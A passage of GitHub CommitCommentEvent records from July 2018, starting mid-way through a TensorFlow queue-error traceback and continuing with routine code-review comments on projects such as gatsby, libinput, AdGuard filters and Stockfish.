DT_FLOAT], timeout_ms=-1, _device=\"/job:localhost/replica:0/task:0/device:CPU:0\"](model/Input/batch_1/fifo_queue, model/Input/batch/n)]]\r\n\r\nCaused by op 'model/Input/batch_1', defined at:\r\nFile \"predict_nick.py\", line 585, in\r\ntf.app.run(main=main(args))\r\nFile \"predict_nick.py\", line 566, in main\r\ntrain(args)\r\nFile \"predict_nick.py\", line 258, in train\r\nmodel = Model(args, data)\r\nFile \"/home/grace/tensorflow/FCRN-DepthPrediction/tensorflow/modules/framework.py\", line 50, in init\r\nself.build_model(data)\r\nFile \"/home/grace/tensorflow/FCRN-DepthPrediction/tensorflow/modules/framework.py\", line 64, in build_model\r\nself.train = Train(self.args, data.tf_train_image_key, data.tf_train_image, data.tf_train_depth_key, data.tf_train_depth, self.input_size, self.output_size, data.datasetObj.max_depth, data.dataset_name, self.args.data_aug)\r\nFile \"/home/grace/tensorflow/FCRN-DepthPrediction/tensorflow/modules/train.py\", line 95, in init\r\ntf_batch_image_resized, tf_batch_image_resized_uint8, tf_batch_depth_resized = tf.train.batch([self.tf_image_resized, self.tf_image_resized_uint8, self.tf_depth_resized], batch_size, num_threads, capacity, shapes=[input_size.getSize(), input_size.getSize(), output_size.getSize()])\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/training/input.py\", line 988, in batch\r\nname=name)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/training/input.py\", line 762, in _batch\r\ndequeued = queue.dequeue_many(batch_size, name=name)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/ops/data_flow_ops.py\", line 483, in dequeue_many\r\nself._queue_ref, n=n, component_types=self._dtypes, name=name)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/ops/gen_data_flow_ops.py\", line 3480, in queue_dequeue_many_v2\r\ncomponent_types=component_types, timeout_ms=timeout_ms, name=name)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/framework/op_def_library.py\", line 787, in _apply_op_helper\r\nop_def=op_def)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/framework/ops.py\", line 3414, in create_op\r\nop_def=op_def)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/framework/ops.py\", line 1740, in init\r\nself._traceback = self._graph._extract_stack() # pylint: disable=protected-access\r\n\r\nOutOfRangeError (see above for traceback): FIFOQueue '_2_model/Input/batch_1/fifo_queue' is closed and has insufficient elements (requested 4, current size 0)\r\n[[Node: model/Input/batch_1 = QueueDequeueManyV2[component_types=[DT_FLOAT, DT_UINT8, DT_FLOAT], timeout_ms=-1, _device=\"/job:localhost/replica:0/task:0/device:CPU:0\"](model/Input/batch_1/fifo_queue, model/Input/batch/n)]]\r\n\r\nHave you encountered this problem? If so, do you know what is wrong and how to fix it?\r\n\r\nThank you in advance,\r\nGrace\r\n\r\nMy email address is lpqdao@gmail.com. Please email me!"}},"created_at":"2018-07-20T03:40:58Z"}
{"id":"7992776011","type":"CommitCommentEvent","actor":{"login":"timm-unity"},"repo":{"name":"johnsietsma/arfoundation-samples"},"payload":{"comment":{"id":29773670,"position":24,"line":43,"path":"Assets/Scripts/ARCameraBackgroundRenderTexture.cs","commit_id":"057847661d5a297b04d6d6bc6593b14e369087cb","created_at":"2018-07-20T03:41:52Z","updated_at":"2018-07-20T03:41:52Z","author_association":"NONE","body":"Makes sense. Why do you have to set these explicitly? They should already have been set by the XRCameraSubsystem (it updates the material each frame with the texture names supplied by the plugin to make them available to the shader)."}},"created_at":"2018-07-20T03:41:52Z"}
{"id":"7992777865","type":"CommitCommentEvent","actor":{"login":"thorncp"},"repo":{"name":"thorncp/dotfiles"},"payload":{"comment":{"id":29773674,"position":null,"line":null,"path":null,"commit_id":"39daa5d6e2d8bec825aa7ccb38e454862f4ee2aa","created_at":"2018-07-20T03:42:41Z","updated_at":"2018-07-20T03:42:41Z","author_association":"OWNER","body":"The best thing so far has been the auto suggestions. It takes your history into account, so it can suggest entire commands, instead of only standard tab completions. For example, typing `git r` auto suggests `git rebase -i origin/master`, which I can complete with a single key press.\r\n\r\nA bonus is a cleaner, easier to understand scripting language.\r\n\r\nI recommend checking it out: https://fishshell.com/docs/current/tutorial.html"}},"created_at":"2018-07-20T03:42:41Z"}
{"id":"7992780983","type":"CommitCommentEvent","actor":{"login":"godmoves"},"repo":{"name":"godmoves/HappyGo"},"payload":{"comment":{"id":29773681,"position":null,"line":null,"path":null,"commit_id":"d5df02c8bc13295bcc94c89a05363eb3c6819c0a","created_at":"2018-07-20T03:44:04Z","updated_at":"2018-07-20T03:44:04Z","author_association":"OWNER","body":"This resolves the  duplicate flag issue from 4577bbdbaed507294069d0e7499eb05c6726fa99"}},"created_at":"2018-07-20T03:44:04Z"}
{"id":"7992787311","type":"CommitCommentEvent","actor":{"login":"jackffjj"},"repo":{"name":"blackplusy/python"},"payload":{"comment":{"id":29773699,"position":null,"line":null,"path":null,"commit_id":"50859c2f2d4121262eccdd415128b09f59dbd9d2","created_at":"2018-07-20T03:46:47Z","updated_at":"2018-07-20T03:46:47Z","author_association":"NONE","body":"user={'jack':123,'gai':234,'xie':345,'li':456}\r\nname=input('please input your name:')\r\n\r\nwhile True:\r\n\r\n    if name not in user:\r\n        print('用户名不存在')\r\n        n1=input('请重新输入：')\r\n        if n1 in user:\r\n            print('请输入您的密码：')\r\n            pw = int(input('密码：'))\r\n            if pw == user.get(n1):\r\n                print('welcome')\r\n                break\r\n            else:\r\n                print(input('密码错误，请重新输入：'))\r\n    else:\r\n        print('请输入您的密码：')\r\n        pw=int(input('密码：'))\r\n        if pw == user.get(name):\r\n            print('welcome')\r\n            break\r\n        else:\r\n            print(input('密码错误，请重新输入：'))"}},"created_at":"2018-07-20T03:46:47Z"}
{"id":"7992787435","type":"CommitCommentEvent","actor":{"login":"NAZMULBABLU"},"repo":{"name":"NAZMULBABLU/StarSpace"},"payload":{"comment":{"id":29773700,"position":null,"line":null,"path":null,"commit_id":"6df6590645711e01e7364afd6d5c1720cdc39945","created_at":"2018-07-20T03:46:49Z","updated_at":"2018-07-20T03:46:49Z","author_association":"OWNER","body":"Renewed "}},"created_at":"2018-07-20T03:46:49Z"}
{"id":"7992799707","type":"CommitCommentEvent","actor":{"login":"zhezii"},"repo":{"name":"lenve/JavaEETest"},"payload":{"comment":{"id":29773727,"position":6,"line":6,"path":"MyBlog/.idea/libraries/Maven__javax_activation_activation_1_1.xml","commit_id":"bc4e975ea99799d688bd84cf42fae431fb6ed10b","created_at":"2018-07-20T03:52:08Z","updated_at":"2018-07-20T03:52:08Z","author_association":"NONE","body":"这是什么功能\r\n"}},"created_at":"2018-07-20T03:52:08Z"}
{"id":"7992801489","type":"CommitCommentEvent","actor":{"login":"TestingCrypto"},"repo":{"name":"TestingCrypto/explorer"},"payload":{"comment":{"id":29773733,"position":null,"line":null,"path":null,"commit_id":"651341e7e7594153ccdbd97fc5a662ec1ec9f7a5","created_at":"2018-07-20T03:52:53Z","updated_at":"2018-07-20T03:52:53Z","author_association":"OWNER","body":"Error: getaddrinfo ENOTFOUND 127.0.0.1:3001\r\n    at errnoException (dns.js:26:10)\r\n    at GetAddrInfoReqWrap.onlookup [as oncomplete] (dns.js:77:26)\r\nevents.js:141\r\n      throw er; // Unhandled 'error' event\r\n      ^\r\n*//breaks build"}},"created_at":"2018-07-20T03:52:53Z"}
{"id":"7992804744","type":"CommitCommentEvent","actor":{"login":"trvsysadmin"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773740,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T03:54:22Z","updated_at":"2018-07-20T03:54:22Z","author_association":"NONE","body":"Serve 9.2.0 api has changed and this commit is failing for gatsby serve with \"Error Module Not Found\" on the `require(`serve`)` statement. Serve now uses `serve-handler` and the `index.js` is inside there. Tests passed because there are no tests for gatsby serve. Furthermore the API has also changed.\r\n\r\nFurther reference on serve's npm page: https://www.npmjs.com/package/serve#api\r\n\r\nI changed gatsby/dist/commands/serve.js to the following and it worked.\r\n\r\n```javascript\r\n\"use strict\";\r\n\r\n/*  weak */\r\nvar signalExit = require(`signal-exit`);\r\n\r\nconst handler = require('serve-handler');\r\nconst http = require('http');\r\n\r\nmodule.exports = function (program) {\r\n    var port = program.port,\r\n        open = program.open,\r\n        directory = program.directory;\r\n\r\n    port = typeof port === `string` ? parseInt(port, 10) : port;\r\n\r\n    const server = http.createServer((request, response, directory) => {\r\n        return handler(request, response, {\r\n            \"public\": \"public\"\r\n        });\r\n    });\r\n\r\n    server.listen(port, () => {\r\n        console.log(\"Serving at port: \", port)\r\n    });\r\n\r\n    signalExit(function (code, signal) {\r\n        server.close();\r\n    });\r\n};\r\n//# sourceMappingURL=serve.js.map\r\n```"}},"created_at":"2018-07-20T03:54:22Z"}
{"id":"7992807325","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29773747,"position":null,"line":null,"path":null,"commit_id":"21be9107a810431a51e4d20dbd31ef50f9dee376","created_at":"2018-07-20T03:55:32Z","updated_at":"2018-07-20T03:55:32Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-20T03:55:32Z"}
{"id":"7992808047","type":"CommitCommentEvent","actor":{"login":"lorishou"},"repo":{"name":"lorishou/performance"},"payload":{"comment":{"id":29773749,"position":2,"line":2,"path":"README.md","commit_id":"80aa7080305a7c136e752d9e491ed7069752b77b","created_at":"2018-07-20T03:55:52Z","updated_at":"2018-07-20T03:55:52Z","author_association":"OWNER","body":"一些性能方面相关的小工具"}},"created_at":"2018-07-20T03:55:52Z"}
{"id":"7992808842","type":"CommitCommentEvent","actor":{"login":"DatBrick"},"repo":{"name":"DatBrick/OpenMM2"},"payload":{"comment":{"id":29773753,"position":null,"line":null,"path":null,"commit_id":"ed3dc1511bf05ae24d9e507e36ec7738e15aa502","created_at":"2018-07-20T03:56:13Z","updated_at":"2018-07-20T03:56:13Z","author_association":"OWNER","body":"I released that over 2 years ago now, and haven't really worked on it since. But it really be shouldn't that hard to figure it out."}},"created_at":"2018-07-20T03:56:13Z"}
{"id":"7992811513","type":"CommitCommentEvent","actor":{"login":"tsalako"},"repo":{"name":"ricglz0201/Team7Repo"},"payload":{"comment":{"id":29773757,"position":4,"line":204,"path":"src/main/java/codeu/model/store/persistence/PersistentDataStore.java","commit_id":"8cd65942750ea00b0a3869c178ff00960fb28e34","created_at":"2018-07-20T03:57:30Z","updated_at":"2018-07-20T03:57:30Z","author_association":"COLLABORATOR","body":"Hey. Not quite sure how this line works. Can you help explain it?"}},"created_at":"2018-07-20T03:57:30Z"}
{"id":"7992812418","type":"CommitCommentEvent","actor":{"login":"huan713"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29773760,"position":5,"line":5,"path":"layouts/docs.vue","commit_id":"df91a8244bb9d9fe5cd5184da0436203a2f29655","created_at":"2018-07-20T03:57:57Z","updated_at":"2018-07-20T03:57:57Z","author_association":"NONE","body":"低级缺陷\r\nec测试"}},"created_at":"2018-07-20T03:57:57Z"}
{"id":"7992816479","type":"CommitCommentEvent","actor":{"login":"PentagramTr"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29773765,"position":null,"line":null,"path":null,"commit_id":"ea2c97fafa9c585800582cbb92b9307367571f51","created_at":"2018-07-20T03:59:38Z","updated_at":"2018-07-20T03:59:38Z","author_association":"NONE","body":"@BlazDT \r\nIs it possible to combine these sites?\r\nMaybe a generic rule can be created for this.\r\n\r\n\r\nhttps://github.com/AdguardTeam/AdguardFilters/blob/ea2c97fafa9c585800582cbb92b9307367571f51/TurkishFilter/sections/specific.txt#L215\r\n\r\nhttps://github.com/AdguardTeam/AdguardFilters/blob/ea2c97fafa9c585800582cbb92b9307367571f51/TurkishFilter/sections/specific.txt#L2063\r\n\r\n```\r\nsaglikaktuel.com##.advert\r\ndizilab.net##.advert\r\ndizilab.me##.advert\r\nafyonanahaber.com.tr##.advert\r\nmerhabahaber.com##.advert\r\ngercekgundem.com##.advert\r\nsariyermanset.com##.advert\r\notohaber.com.tr##.advert\r\nhaberartiturk.com##.advert\r\nyeniduzen.com##.advert\r\nanalizmerkezi.com##.advert\r\n```\r\n\r\n\r\nPlease also add this site.I guess it's the same class.\r\nhttp://www.liderhaber.org/dis-hekiminden-uyari-349570h.htm\r\n\r\n<details><summary>Screenshot:</summary>\r\n\r\n![www liderhaber org](https://user-images.githubusercontent.com/34379403/42982043-0a63f1e2-8be8-11e8-96fd-ddf04cc5bbd7.png)\r\n\r\n\r\n</details>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-20T03:59:38Z"}
{"id":"7992818044","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773773,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T04:00:16Z","updated_at":"2018-07-20T04:00:16Z","author_association":"CONTRIBUTOR","body":"Oh hmmm... 👍 thanks for the research! Do you think you'll have a time to PR a fix? "}},"created_at":"2018-07-20T04:00:16Z"}
{"id":"7992819210","type":"CommitCommentEvent","actor":{"login":"Froydis"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29773777,"position":null,"line":null,"path":null,"commit_id":"6c9060a6a8669ddbb903bc5ace3acb057b464e73","created_at":"2018-07-20T04:00:47Z","updated_at":"2018-07-20T04:00:47Z","author_association":"NONE","body":"\r\n[9469C56FBAEAFFB3C8E3BDCBEF77AFBE0F40-3 (2).pdf](https://github.com/github/opensource.guide/files/2212396/9469C56FBAEAFFB3C8E3BDCBEF77AFBE0F40-3.2.pdf)\r\n"}},"created_at":"2018-07-20T04:00:47Z"}
{"id":"7992821501","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29773779,"position":null,"line":null,"path":null,"commit_id":"7f3ac1c8466314704f2aa5230bef20a552ee2864","created_at":"2018-07-20T04:01:47Z","updated_at":"2018-07-20T04:01:47Z","author_association":"COLLABORATOR","body":"- Experiments removed:\r\n• `GUILD_CREATE_INVITE_MODAL: \"2018-03_friend-invite-guild-create\"`\r\n• `NEW_AUTH: \"2018-2_new-auth-screens\"`\r\n• `XBOX_LOGIN: \"2018-4_xbox_login\"`\r\n• `EVERYONE_WARNING: \"2018-05_everyone_warning\"`\r\n• `GROUP_DM_INVITE_LINKS: \"2018-05_group-dm-invite-links\"`\r\n\r\n- New `LobbyError`: `ALREADY_CONNECTING: 7`"}},"created_at":"2018-07-20T04:01:47Z"}
{"id":"7992823652","type":"CommitCommentEvent","actor":{"login":"kristapuciitis"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29773786,"position":14,"line":14,"path":"stand/efi/loader/multiboot2_tramp.S","commit_id":"43a53d3fdd96bc5e2a4ba2bb145a0e79b1ab85d5","created_at":"2018-07-20T04:02:45Z","updated_at":"2018-07-20T04:02:45Z","author_association":"OWNER","body":"I did it in similar way as in stand/efi/loader/arch/amd64/amd64_tramp.S"}},"created_at":"2018-07-20T04:02:45Z"}
{"id":"7992824163","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29773787,"position":null,"line":null,"path":null,"commit_id":"510019d767d189abce6125b6170d5698cd64b641","created_at":"2018-07-20T04:02:59Z","updated_at":"2018-07-20T04:02:59Z","author_association":"COLLABORATOR","body":"```js\r\nt.OverlayEventTypes = {\r\n    CONNECT: null,\r\n    ADD_CHANGE_LISTENER: null,\r\n    REMOVE_CHANGE_LISTENER: null,\r\n    STORES: null,\r\n    DISPATCH: null,\r\n    LOG_MESSAGES: null,\r\n    SET_GAME_INFO: null,\r\n    ANALYTICS_TRACK: null\r\n}\r\n```"}},"created_at":"2018-07-20T04:02:59Z"}
{"id":"7992825171","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29773789,"position":null,"line":null,"path":null,"commit_id":"1647c550e07ec62c407299b9b06a42a7db0a924e","created_at":"2018-07-20T04:03:28Z","updated_at":"2018-07-20T04:03:28Z","author_association":"COLLABORATOR","body":"- Action type removed: `MESSAGE_UPDATE_EDIT`"}},"created_at":"2018-07-20T04:03:28Z"}
{"id":"7992826615","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29773790,"position":null,"line":null,"path":null,"commit_id":"e9721e63ef2dbeae331949b86e69114dea0c45da","created_at":"2018-07-20T04:04:03Z","updated_at":"2018-07-20T04:04:03Z","author_association":"NONE","body":"there were many crashes in the STC. I suspect Stefano would like to address those before submitting an LTC. "}},"created_at":"2018-07-20T04:04:03Z"}
{"id":"7992829741","type":"CommitCommentEvent","actor":{"login":"wdonayre"},"repo":{"name":"kristofer/wp-sync-db"},"payload":{"comment":{"id":29773792,"position":6,"line":1262,"path":"class/wpsdb.php","commit_id":"0ccea3cf5562dcf7230ff27e341ee81e0c34ec6b","created_at":"2018-07-20T04:05:25Z","updated_at":"2018-07-20T04:05:25Z","author_association":"NONE","body":"switching these two should be able to get the value correctly. "}},"created_at":"2018-07-20T04:05:25Z"}
{"id":"7992834778","type":"CommitCommentEvent","actor":{"login":"huan713"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29773800,"position":14,"line":47,"path":"components/ProjectList.vue","commit_id":"646bab47bc5b50c3c61c6e68678d54bbac0e012f","created_at":"2018-07-20T04:07:45Z","updated_at":"2018-07-20T04:07:45Z","author_association":"NONE","body":"高级缺陷\r\nec测试"}},"created_at":"2018-07-20T04:07:45Z"}
{"id":"7992834994","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29773806,"position":null,"line":null,"path":null,"commit_id":"e9721e63ef2dbeae331949b86e69114dea0c45da","created_at":"2018-07-20T04:07:50Z","updated_at":"2018-07-20T04:07:50Z","author_association":"NONE","body":"@AndyGrant I overlooked that.  Thank you for catching my mistake!"}},"created_at":"2018-07-20T04:07:50Z"}
{"id":"7992836270","type":"CommitCommentEvent","actor":{"login":"tison1"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29773808,"position":null,"line":null,"path":null,"commit_id":"11d081bd194d58c23c0d195ed6a7c990a3d2bd5b","created_at":"2018-07-20T04:08:23Z","updated_at":"2018-07-20T04:08:23Z","author_association":"MEMBER","body":"```\r\nP6_DOC_TEST_VERBOSE=1 prove --timer --formatter=TAP::Formatter::JUnit -e perl6 t > shippable/testresults/doctests.xml\r\n# There's been this error in file: xt/aspell.t\r\n# Use of uninitialized value $repo-id of type Any in string context.\r\n# Methods .^name, .perl, .gist, or .say can be used to stringi\r\n# \r\n# There's been this error in file: xt/aspell.t\r\n# fy it to something meaningful.\r\n# \r\n# \r\n# There's been this error in file: xt/aspell.t\r\n#   in any statement_control at /opt/rakudo-pkg-for-doc/share/nqp/lib/Perl6/Grammar.moarvm line 1\r\n# Use of uninitialized value $rep\r\n# \r\n# There's been this error in file: xt/aspell.t\r\n# o-id of type Any in string context.\r\n# Methods .^name, .perl, .gist, or .say can be used to stringify it to something meaningful.\r\n#   in any statement_control at /opt/rakudo-pkg-for-doc/share/nqp/lib/Perl6/Grammar.moarvm line 1\r\n# \r\n# \r\n# Failed test 'xt/aspell.t POD6 and syntax check out'\r\n# at t/02-tests-valid.t line 26\r\n# Looks like you failed 1 test of 20\r\n```\r\n\r\nabove is what snippable  complains. I don't have env locally, and after check `xt/aspell.t`, not find anything obvious wrong."}},"created_at":"2018-07-20T04:08:23Z"}
{"id":"7992836847","type":"CommitCommentEvent","actor":{"login":"trvsysadmin"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773811,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T04:08:38Z","updated_at":"2018-07-20T04:08:38Z","author_association":"NONE","body":"Ok, will do now."}},"created_at":"2018-07-20T04:08:38Z"}
{"id":"7992838733","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773813,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T04:09:26Z","updated_at":"2018-07-20T04:09:26Z","author_association":"CONTRIBUTOR","body":"Thanks 🙏 "}},"created_at":"2018-07-20T04:09:26Z"}
{"id":"7992840929","type":"CommitCommentEvent","actor":{"login":"petitdn15"},"repo":{"name":"petitdn15/jose"},"payload":{"comment":{"id":29773818,"position":1,"line":1,"path":"README.md","commit_id":"9d04a73b7045a1d663034b78cc2dc71d22b8f6ce","created_at":"2018-07-20T04:10:27Z","updated_at":"2018-07-20T04:10:27Z","author_association":"OWNER","body":"Jose Daniel Zambrano De La Rosa XD\r\n"}},"created_at":"2018-07-20T04:10:27Z"}
{"id":"7992842022","type":"CommitCommentEvent","actor":{"login":"petitdn15"},"repo":{"name":"petitdn15/jose"},"payload":{"comment":{"id":29773822,"position":1,"line":1,"path":"README.md","commit_id":"9d04a73b7045a1d663034b78cc2dc71d22b8f6ce","created_at":"2018-07-20T04:10:59Z","updated_at":"2018-07-20T04:10:59Z","author_association":"OWNER","body":"…\r\n"}},"created_at":"2018-07-20T04:10:59Z"}
{"id":"7992844291","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773824,"position":null,"line":null,"path":null,"commit_id":"380a3be47537e1f03399cad939ddcc61987c8533","created_at":"2018-07-20T04:12:04Z","updated_at":"2018-07-20T04:12:04Z","author_association":"NONE","body":"fwiw, this is a \"no\" from upstream because the name of the build directory is freely chosen by the developer"}},"created_at":"2018-07-20T04:12:04Z"}
{"id":"7992844964","type":"CommitCommentEvent","actor":{"login":"4c0n"},"repo":{"name":"laradock/laradock"},"payload":{"comment":{"id":29773825,"position":null,"line":null,"path":null,"commit_id":"4ce25e95b48b2a9e51f569c597689597d54506d6","created_at":"2018-07-20T04:12:21Z","updated_at":"2018-07-20T04:12:21Z","author_association":"CONTRIBUTOR","body":"@bbashy You're very welcome :)"}},"created_at":"2018-07-20T04:12:21Z"}
{"id":"7992845282","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773826,"position":7,"line":1489,"path":"src/evdev-mt-touchpad.c","commit_id":"92c52251d11ca72496556cd949730d33083e5c8d","created_at":"2018-07-20T04:12:30Z","updated_at":"2018-07-20T04:12:30Z","author_association":"NONE","body":"detritus, please remove"}},"created_at":"2018-07-20T04:12:30Z"}
{"id":"7992848757","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773828,"position":18,"line":1499,"path":"src/evdev-mt-touchpad.c","commit_id":"92c52251d11ca72496556cd949730d33083e5c8d","created_at":"2018-07-20T04:14:05Z","updated_at":"2018-07-20T04:14:05Z","author_association":"NONE","body":"don't forget to clean this up (indentation, but really the comment can be removed - the information is in the diff)"}},"created_at":"2018-07-20T04:14:05Z"}
{"id":"7992848971","type":"CommitCommentEvent","actor":{"login":"yelllong"},"repo":{"name":"yelllong/publicems"},"payload":{"comment":{"id":29773829,"position":null,"line":null,"path":null,"commit_id":"bf671ae5f6a82127b2b077d31c227295fc1e70e4","created_at":"2018-07-20T04:14:10Z","updated_at":"2018-07-20T04:14:10Z","author_association":"OWNER","body":"呵呵 哈哈"}},"created_at":"2018-07-20T04:14:10Z"}
{"id":"7992850224","type":"CommitCommentEvent","actor":{"login":"yelllong"},"repo":{"name":"yelllong/publicems"},"payload":{"comment":{"id":29773830,"position":4,"line":17,"path":"readme.txt","commit_id":"bf671ae5f6a82127b2b077d31c227295fc1e70e4","created_at":"2018-07-20T04:14:42Z","updated_at":"2018-07-20T04:14:42Z","author_association":"OWNER","body":"呵呵呵 你好啊"}},"created_at":"2018-07-20T04:14:42Z"}
{"id":"7992855096","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773837,"position":49,"line":1524,"path":"src/evdev-mt-touchpad.c","commit_id":"92c52251d11ca72496556cd949730d33083e5c8d","created_at":"2018-07-20T04:16:52Z","updated_at":"2018-07-20T04:16:52Z","author_association":"NONE","body":"hmm. So in the case of edge scrolling, one of these will *always* trigger because having both fingers on exactly the same x/y coordinate is virtually impossible. There needs to be some other check too, given that you removed the `speed_exceeded_count` condition and we're much more likely to call into this code now.\r\n\r\nAs a general advice - run the test suite to check if anything known breaks, it makes life easier (well, first harder but overall easier :)"}},"created_at":"2018-07-20T04:16:52Z"}
{"id":"7992859407","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773846,"position":null,"line":null,"path":null,"commit_id":"5e506bc7eca328597a53b6b7da8e82b74a8a9dc6","created_at":"2018-07-20T04:18:52Z","updated_at":"2018-07-20T04:18:52Z","author_association":"NONE","body":"what's the motivation behind this? This mostly seem unrelated to the gitlab #5 issue?\r\n\r\nWhen do we need a gesture while a button is held down? Is there any UI that requires this?"}},"created_at":"2018-07-20T04:18:52Z"}
{"id":"7992860470","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773849,"position":30,"line":1510,"path":"src/evdev-mt-touchpad.c","commit_id":"304db343adc9c3147841d651e015e1ca21a065e4","created_at":"2018-07-20T04:19:24Z","updated_at":"2018-07-20T04:19:24Z","author_association":"NONE","body":"this should be squashed into the other commit"}},"created_at":"2018-07-20T04:19:24Z"}
{"id":"7992862887","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773850,"position":null,"line":null,"path":null,"commit_id":"a0367f4e41f892edad0fab6fcb77e8e40040142f","created_at":"2018-07-20T04:20:28Z","updated_at":"2018-07-20T04:20:28Z","author_association":"NONE","body":"fwiw, I *really* need someone to spend some time actually measuring this so we can figure out what number is good enough. the 20 mm was just a guess, but every request to get some real data so far has been met with crickets."}},"created_at":"2018-07-20T04:20:28Z"}
{"id":"7992865481","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773856,"position":21,"line":1489,"path":"src/evdev-mt-touchpad.c","commit_id":"304db343adc9c3147841d651e015e1ca21a065e4","created_at":"2018-07-20T04:21:43Z","updated_at":"2018-07-20T04:21:43Z","author_association":"NONE","body":"for development branches - always rebase. Much easier for you to keep a clean patchset this way and much easier for random reviewers to grasp what's going on. This commit is partially outdated by the one already merged upstream now, I think."}},"created_at":"2018-07-20T04:21:43Z"}
{"id":"7992866578","type":"CommitCommentEvent","actor":{"login":"johnsietsma"},"repo":{"name":"johnsietsma/arfoundation-samples"},"payload":{"comment":{"id":29773859,"position":24,"line":43,"path":"Assets/Scripts/ARCameraBackgroundRenderTexture.cs","commit_id":"057847661d5a297b04d6d6bc6593b14e369087cb","created_at":"2018-07-20T04:22:13Z","updated_at":"2018-07-20T04:22:13Z","author_association":"OWNER","body":"Oh, good point! I'll test without."}},"created_at":"2018-07-20T04:22:13Z"}
{"id":"7992868281","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773862,"position":22,"line":8,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:23:01Z","updated_at":"2018-07-20T04:23:01Z","author_association":"NONE","body":"`affordable`이라는 이름의 함수면 true/false 반환하는게 더 적절해 보이는데\r\n왜 굳이 String을 반환하는것으로 바꾼 것?"}},"created_at":"2018-07-20T04:23:01Z"}
{"id":"7992868596","type":"CommitCommentEvent","actor":{"login":"jiyeyuran"},"repo":{"name":"micro/go-micro"},"payload":{"comment":{"id":29773863,"position":null,"line":null,"path":null,"commit_id":"ba8582a47a5c1af18b554680a095aa0d21dcae49","created_at":"2018-07-20T04:23:11Z","updated_at":"2018-07-20T04:23:11Z","author_association":"NONE","body":"This commit breaks the default retries. By default, there is no retry when error happens. Correspondingly， DefaultRetries should set to 0."}},"created_at":"2018-07-20T04:23:11Z"}
{"id":"7992872264","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773868,"position":33,"line":18,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:24:59Z","updated_at":"2018-07-20T04:24:59Z","author_association":"NONE","body":"늑인겜 만들때 내가 이런식으로 작성을 하긴 했는데\r\n돌이켜보면 이게 그리 좋은 방법은 아니라고 생각함, 특히 프로젝트 커질수록\r\n\r\n사실 차라리 추가 argument로 You 인스턴스를 받아와서 처리하는 것이 더 스크립트 읽기에 편할 것이라고 생각함\r\n\r\n`afford(you, speedCost)`"}},"created_at":"2018-07-20T04:24:59Z"}
